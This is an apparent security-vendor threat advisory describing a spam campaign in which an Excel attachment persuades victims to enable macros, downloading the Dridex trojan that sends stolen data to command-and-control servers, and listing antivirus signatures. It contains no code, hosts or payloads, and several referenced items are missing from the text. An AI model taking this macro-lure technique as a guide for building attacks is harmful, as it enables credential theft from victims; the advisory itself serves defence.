Malicious Microsoft office macros downloading Dridex trojan

January 12, 2015

The Dell Sonicwall Threats team has recently came across a scam luring the innocent victims to turn on macros in Microsoft Office, thus downloading Dridex trojan through the malicious macros.

Infection Cycle:

The spam email spreads this threat with the subjects such as

The attachment is an Excel sheet (attachment.XLS)(detected as GAV: Downloader.DA ) which contains the malicious macros. When it is opened, it is a blank document. It states that the macros should be enabled to see the document. By default, these are disabled.

Once the macros are enabled, the user still cannot see any content on the excel sheet it has three empty tabs with Russian or cyrilic characters.

On the background, the malware tries to establish HTTP connection

It then downloads an executable LNUDTUFLKOJ.exe [detected as GAV: Dridex.VVPT.

This trojan tries to steal information from the victim's machine post it to the remote Command & Control servers.

The decrypted post message is as follows:

The Dell SonicWall threats team urges users to not fall for these scams. SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Downloader.DA (Trojan)
  • GAV: Dridex.VVPT (Trojan)